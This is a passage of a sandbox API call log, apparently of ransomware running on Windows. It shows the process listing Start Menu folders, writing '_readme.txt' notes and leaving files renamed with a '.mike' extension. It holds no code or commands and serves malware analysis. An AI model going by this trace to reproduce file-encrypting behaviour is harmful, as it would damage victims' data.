cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 0 [0156.476] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.476] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.476] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.477] CoTaskMemFree (pv=0x508980) [0156.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0156.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c955520, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c955520, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c955520, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xdd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Digital Certificate for VBA Projects.lnk.mike", cAlternateFileName="DIGITA~1.MIK")) returned 1 [0156.480] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0156.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0156.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0156.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0156.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af090) returned 1 [0156.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0156.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0156.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0156.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0156.484] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\_readme.txt", lpFilePart=0x0) returned 0x71 [0156.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef80) returned 1 [0156.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef7c) returned 1 [0156.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0156.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0156.487] WriteFile (in: hFile=0x1c8, lpBuffer=0x2189790*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x2189790*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0156.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0156.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0156.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0156.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0156.491] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\_readme.txt.mike", lpFilePart=0x0) returned 0x76 [0156.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0156.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0156.492] WriteFile (in: hFile=0x1c8, lpBuffer=0x218f234*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x218f234*, lpNumberOfBytesWritten=0x2aef9c*=0x460, lpOverlapped=0x0) returned 1 [0156.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef24) returned 1 [0156.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef20) returned 1 [0156.682] WriteFile (in: hFile=0x1c8, lpBuffer=0x21924b4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x21924b4*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0156.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0156.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0156.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.684] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0156.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0156.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef48) returned 1 [0156.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef44) returned 1 [0156.688] WriteFile (in: hFile=0x1c8, lpBuffer=0x2195eb4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x2195eb4*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0156.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0156.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c955520, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c955520, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c955520, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xdd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Digital Certificate for VBA Projects.lnk.mike", cAlternateFileName="DIGITA~1.MIK")) returned 1 [0156.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c955520, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c955520, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c97b680, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd90, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Clip Organizer.lnk.mike", cAlternateFileName="MICROS~1.MIK")) returned 1 [0156.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c97b680, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c97b680, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c97b680, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 2010 Language Preferences.lnk.mike", cAlternateFileName="MICROS~2.MIK")) returned 1 [0156.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c97b680, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c97b680, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c9a17e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 2010 Upload Center.lnk.mike", cAlternateFileName="MICROS~3.MIK")) returned 1 [0156.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9a17e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c9a17e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c9a17e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office Picture Manager.lnk.mike", cAlternateFileName="MICROS~4.MIK")) returned 1 [0156.693] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9c7940, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c9c7940, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c9c7940, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xde0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Project Server 2010 Accounts.lnk.mike", cAlternateFileName="MIF5FD~1.MIK")) returned 1 [0156.693] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c955520, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26ac0900, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x26ae6a60, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0156.694] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x268d1720, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x268d1720, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x26ac0900, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 1 [0156.694] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x268d1720, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x268d1720, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x26ac0900, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 0 [0156.694] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0156.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0156.695] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.695] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.695] CoTaskMemFree (pv=0x508980) [0156.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.697] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9c7940, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c9c7940, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c9edaa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SharePoint Workspace 2010.lnk.mike", cAlternateFileName="MICROS~1.MIK")) returned 1 [0156.697] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0156.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0156.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0156.699] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.701] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\_readme.txt", lpFilePart=0x0) returned 0x4f [0156.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0156.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0156.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.704] WriteFile (in: hFile=0x1c8, lpBuffer=0x219f2d4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x219f2d4*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0156.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0156.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0156.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0156.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0156.708] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\_readme.txt.mike", lpFilePart=0x0) returned 0x54 [0156.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.708] WriteFile (in: hFile=0x1c8, lpBuffer=0x21a4cf0*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x21a4cf0*, lpNumberOfBytesWritten=0x2aefe4*=0x460, lpOverlapped=0x0) returned 1 [0156.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0156.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0156.712] WriteFile (in: hFile=0x1c8, lpBuffer=0x21a7f2c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21a7f2c*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0156.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.714] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0156.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0156.718] WriteFile (in: hFile=0x1c8, lpBuffer=0x21ab464*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x21ab464*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0156.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.720] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9c7940, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c9c7940, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c9edaa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SharePoint Workspace 2010.lnk.mike", cAlternateFileName="MICROS~1.MIK")) returned 1 [0156.814] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9edaa0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26b0cbc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x26b0cbc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0156.815] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ae6a60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26ae6a60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x26b0cbc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 1 [0156.815] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ae6a60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26ae6a60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x26b0cbc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 0 [0156.816] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.816] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.816] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.817] CoTaskMemFree (pv=0x508980) [0156.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2832bdaf, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2832bdaf, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.818] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.820] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2832bdaf, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2832bdaf, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.820] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2832bdaf, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2832bdaf, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0156.821] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.821] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.821] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.822] CoTaskMemFree (pv=0x508980) [0156.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.823] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x9182055d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.823] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x9182055d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0156.825] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.826] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.826] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.826] CoTaskMemFree (pv=0x508980) [0156.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0156.827] FindNextFileW (in: hFindFile=0x4d1060, 